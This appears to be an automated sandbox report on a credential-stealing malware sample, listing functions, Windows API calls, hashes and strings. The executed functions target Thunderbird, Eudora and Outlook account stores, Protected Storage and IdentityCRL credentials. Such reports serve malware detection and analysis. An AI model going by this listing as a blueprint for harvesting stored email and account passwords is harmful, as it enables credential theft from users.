                                                                                                                                                                                                                      • API String ID: 568519121-3652327722
                                                                                                                                                                                                                      • Opcode ID: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                                                                                                                                                                      • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 004018DB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: PlacementWindowmemset
                                                                                                                                                                                                                      • String ID: WinPos
                                                                                                                                                                                                                      • API String ID: 4036792311-2823255486
                                                                                                                                                                                                                      • Opcode ID: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                                                                                                                                                                      • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040DCE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                                                                                                                      • wcsrchr.MSVCRT ref: 0040DCE9
                                                                                                                                                                                                                      • wcscat.MSVCRT ref: 0040DCFF
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FileModuleNamewcscatwcsrchr
                                                                                                                                                                                                                      • String ID: _lng.ini
                                                                                                                                                                                                                      • API String ID: 383090722-1948609170
                                                                                                                                                                                                                      • Opcode ID: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                                                                                                                                                                                                      • Instruction ID: 003e7a9acac466aac22365d7a2b75ab102816a5e64793edac74c8fca87dba5cc
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CEC0129654561430F51526116C03B4E12585F13316F21006BFD01340C3EFAD5705406F
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00414B81 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 13libraryloaderCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                                                                                                                                                                                                                      • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                                                                                                                                                                                      • API String ID: 2773794195-880857682
                                                                                                                                                                                                                      • Opcode ID: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                                                                                                                                                                                                      • Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0042B9BD Relevance: 5.2, APIs: 4, Instructions: 181COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy$memset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 438689982-0
                                                                                                                                                                                                                      • Opcode ID: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                                                                                                                                                                                      • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040E820 Relevance: 5.1, APIs: 4, Instructions: 70COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??2@$memset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1860491036-0
                                                                                                                                                                                                                      • Opcode ID: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                                                                                                                                                                                      • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00408ADC Relevance: 5.1, APIs: 4, Instructions: 63COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memcmp.MSVCRT ref: 00408AF3
                                                                                                                                                                                                                        • Part of subcall function 00408A6E: memcmp.MSVCRT ref: 00408A8C
                                                                                                                                                                                                                        • Part of subcall function 00408A6E: memcpy.MSVCRT ref: 00408ABB
                                                                                                                                                                                                                        • Part of subcall function 00408A6E: memcpy.MSVCRT ref: 00408AD0
                                                                                                                                                                                                                      • memcmp.MSVCRT ref: 00408B2B
                                                                                                                                                                                                                      • memcmp.MSVCRT ref: 00408B5C
                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 00408B79
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcmp$memcpy
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 231171946-0
                                                                                                                                                                                                                      • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                                                                                                                                                      • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00409D1F Relevance: 5.0, APIs: 4, Instructions: 32COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: wcslen$wcscat$wcscpy
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1961120804-0
                                                                                                                                                                                                                      • Opcode ID: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                                                                                                                                                                                      • Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Executed Functions

                                                                                                                                                                                                                      Function 00408043 Relevance: 31.6, APIs: 11, Strings: 7, Instructions: 143stringCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 129 408043-40818c memset * 4 GetComputerNameA GetUserNameA MultiByteToWideChar * 2 strlen * 2 memcpy 130 4081c2-4081c5 129->130 131 40818e 129->131 133 4081f6-4081fa 130->133 134 4081c7-4081d0 130->134 132 408194-40819d 131->132 135 4081a4-4081c0 132->135 136 40819f-4081a3 132->136 137 4081d2-4081d6 134->137 138 4081d7-4081f4 134->138 135->130 135->132 136->135 137->138 138->133 138->134
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004080A5
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004080B9
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004080D3
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004080E8
                                                                                                                                                                                                                      • GetComputerNameA.KERNEL32(?,?), ref: 0040810A
                                                                                                                                                                                                                      • GetUserNameA.ADVAPI32(?,?), ref: 0040811E
                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 0040813D
                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 00408152
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040815B
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040816A
                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 0040817C
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                                                                                                                                                                                                      • String ID: 5$H$O$b$i$}$}
                                                                                                                                                                                                                      • API String ID: 1832431107-3760989150
                                                                                                                                                                                                                      • Opcode ID: 79ae67408c577b497298e938f7cc844113f9d56d662cffe44a33c18994f8cf05
                                                                                                                                                                                                                      • Instruction ID: 839b780f30062d9b3c48c7c4bb1edbc251b0819f5d773de0f2740150403ea89f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 79ae67408c577b497298e938f7cc844113f9d56d662cffe44a33c18994f8cf05
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D151D771C0025DAEDB11CBA8CC41BEEBBBCEF49314F0441EAE555AA182D3389B45CB65
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00407C87 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58filestringCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 432 407c87-407c90 433 407c92-407cb1 FindFirstFileA 432->433 434 407cb3-407cc7 FindNextFileA 432->434 435 407cce-407cd3 433->435 436 407cd5-407d03 strlen * 2 434->436 437 407cc9 call 407d1f 434->437 435->436 439 407d18-407d1e 435->439 440 407d12 436->440 441 407d05-407d10 call 406e81 436->441 437->435 443 407d15-407d17 440->443 441->443 443->439
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • FindFirstFileA.KERNELBASE(?,?,?,?,0044375D,*.oeaccount,.8D,?,00000104), ref: 00407C9D
                                                                                                                                                                                                                      • FindNextFileA.KERNELBASE(?,?,?,?,0044375D,*.oeaccount,.8D,?,00000104), ref: 00407CBB
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00407CEB
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00407CF3
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FileFindstrlen$FirstNext
                                                                                                                                                                                                                      • String ID: .8D
                                                                                                                                                                                                                      • API String ID: 379999529-2881260426
                                                                                                                                                                                                                      • Opcode ID: 154419784104938abdfe7f8196f43bddff311a2641cbca57966d1cc2155f4921
                                                                                                                                                                                                                      • Instruction ID: eb3e2fb57be8f0c3c515892a2c877e6408fe4d7e79a86a2feb9bdace6263c32c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 154419784104938abdfe7f8196f43bddff311a2641cbca57966d1cc2155f4921
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2F11A072909201AFE3109B38D844AEB73DCEF45325F600A2FF05AE31C1EB38A9409729
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00401E60 Relevance: 52.8, APIs: 19, Strings: 11, Instructions: 261stringregistryCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00401E82
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00401E9B
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00401EA9
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00401EEF
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00401EFD
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00401FA8
                                                                                                                                                                                                                      • atoi.MSVCRT ref: 00401FD7
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00401FFA
                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 00402027
                                                                                                                                                                                                                        • Part of subcall function 00410493: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 004104CC
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040207D
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00402092
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00402098
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 004020A6
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 004020D9
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 004020E7
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040200F
                                                                                                                                                                                                                        • Part of subcall function 00406E81: _mbscpy.MSVCRT ref: 00406E89
                                                                                                                                                                                                                        • Part of subcall function 00406E81: _mbscat.MSVCRT ref: 00406E98
                                                                                                                                                                                                                      • _mbscpy.MSVCRT ref: 0040216E
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00402178
                                                                                                                                                                                                                      • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104), ref: 00402193
                                                                                                                                                                                                                        • Part of subcall function 00406D1F: GetFileAttributesA.KERNELBASE(?,00401EDD,?), ref: 00406D23
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: strlen$memset$Close_mbscpy$AttributesEnvironmentExpandFileStrings_mbscatatoisprintf
                                                                                                                                                                                                                      • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                                                                                                                                                                                                                      • API String ID: 1846531875-4223776976
                                                                                                                                                                                                                      • Opcode ID: 6aa4cd9d89fa12e6f5449d6eef6c1575bbd370b4a07fc5a8c776129ac04f2371
                                                                                                                                                                                                                      • Instruction ID: f32954dd371ee46ce489a3e15048bba03ea5248cf67d2e34683548b394895fb7
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6aa4cd9d89fa12e6f5449d6eef6c1575bbd370b4a07fc5a8c776129ac04f2371
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CA91D772804118AAEB21E7A1CC46FDF77BC9F54315F1400BBF608F2182EB789B858B59
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040CC66 Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 169COMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00404A94: LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB3
                                                                                                                                                                                                                        • Part of subcall function 00404A94: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404AC5
                                                                                                                                                                                                                        • Part of subcall function 00404A94: FreeLibrary.KERNEL32(00000000), ref: 00404AD9
                                                                                                                                                                                                                        • Part of subcall function 00404A94: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B04
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 0040CEB2
                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 0040CEC8
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                                                                                                                                                                                                                      • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !
                                                                                                                                                                                                                      • API String ID: 745651260-375988210
                                                                                                                                                                                                                      • Opcode ID: 3ead8dc900f3123aa2ba669505af08cf64fa6c44fe5d0b8ef6125ed5f56e8d9c
                                                                                                                                                                                                                      • Instruction ID: 177dcc30e6d6fe1e6f6b961e060c6fa8e32a60297cdf5fc43279ddd28c1616a1
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3ead8dc900f3123aa2ba669505af08cf64fa6c44fe5d0b8ef6125ed5f56e8d9c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3661A075408341DBDB20AFA1DC88A9FB7F8BF85305F00093FF545A21A2DB789904CB5A
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00403C03 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 184libraryloaderCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00410166: FreeLibrary.KERNELBASE(?,00403C1D), ref: 00410172
                                                                                                                                                                                                                      • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C22
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C37
                                                                                                                                                                                                                      • _mbscpy.MSVCRT ref: 00403E41
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • PStoreCreateInstance, xrefs: 00403C31
                                                                                                                                                                                                                      • www.google.com/Please log in to your Google Account, xrefs: 00403C87
                                                                                                                                                                                                                      • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D28
                                                                                                                                                                                                                      • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D5B
                                                                                                                                                                                                                      • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CC3
                                                                                                                                                                                                                      • www.google.com/Please log in to your Gmail account, xrefs: 00403C73
                                                                                                                                                                                                                      • www.google.com:443/Please log in to your Google Account, xrefs: 00403C91
                                                                                                                                                                                                                      • pstorec.dll, xrefs: 00403C1D
                                                                                                                                                                                                                      • www.google.com:443/Please log in to your Gmail account, xrefs: 00403C7D
                                                                                                                                                                                                                      • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D2F
                                                                                                                                                                                                                      • Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403D91
                                                                                                                                                                                                                      • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CE8
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Library$AddressFreeLoadProc_mbscpy
                                                                                                                                                                                                                      • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                                                                                                                                                                                                                      • API String ID: 1197458902-317895162
                                                                                                                                                                                                                      • Opcode ID: f6bc8121a93fa9ff4bc87b9f29a8f644e5a8c2d28e7501eaeea369390cda5a4c
                                                                                                                                                                                                                      • Instruction ID: 8c3092e028ed30b7bcb0bf0438431f6e947b4810b401e401bf51def59c6c6aaf
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f6bc8121a93fa9ff4bc87b9f29a8f644e5a8c2d28e7501eaeea369390cda5a4c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5C51A571600615B6E714AF71CD86FEAB76CAF00709F20053FF904B61C2DBBDBA5486A9
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040F478 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 101registryCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 231 40f478-40f4ad call 4446d0 RegOpenKeyExA 234 40f4b3-40f4c7 RegOpenKeyExA 231->234 235 40f5af-40f5b5 231->235 236 40f5a5-40f5a9 RegCloseKey 234->236 237 40f4cd-40f4f6 RegQueryValueExA 234->237 236->235 238 40f59b-40f59f RegCloseKey 237->238 239 40f4fc-40f50b call 40472f 237->239 238->236 239->238 242 40f511-40f549 call 4047a0 239->242 242->238 245 40f54b-40f553 242->245 246 40f591-40f595 LocalFree 245->246 247 40f555-40f58c memcpy * 2 call 40f177 245->247 246->238 247->246
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E6C,?), ref: 0040F4A9
                                                                                                                                                                                                                      • RegOpenKeyExA.KERNELBASE(?,Dynamic Salt,00000000,00020019,?,?,?,?,?,00403E6C,?), ref: 0040F4C3
                                                                                                                                                                                                                      • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E6C,?), ref: 0040F4EE
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E6C,?), ref: 0040F59F
                                                                                                                                                                                                                        • Part of subcall function 0040472F: LoadLibraryA.KERNELBASE(?,0040F08A,?,00000000), ref: 00404737
                                                                                                                                                                                                                        • Part of subcall function 0040472F: GetProcAddress.KERNEL32(00000000,?), ref: 0040474F
                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 0040F55C
                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 0040F571
                                                                                                                                                                                                                        • Part of subcall function 0040F177: RegOpenKeyExA.ADVAPI32(0040F591,Creds,00000000,00020019,0040F591,0044FE50,00000040,?,?,0040F591,?,?,?,?), ref: 0040F1A1
                                                                                                                                                                                                                        • Part of subcall function 0040F177: memset.MSVCRT ref: 0040F1BF
                                                                                                                                                                                                                        • Part of subcall function 0040F177: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F2C3
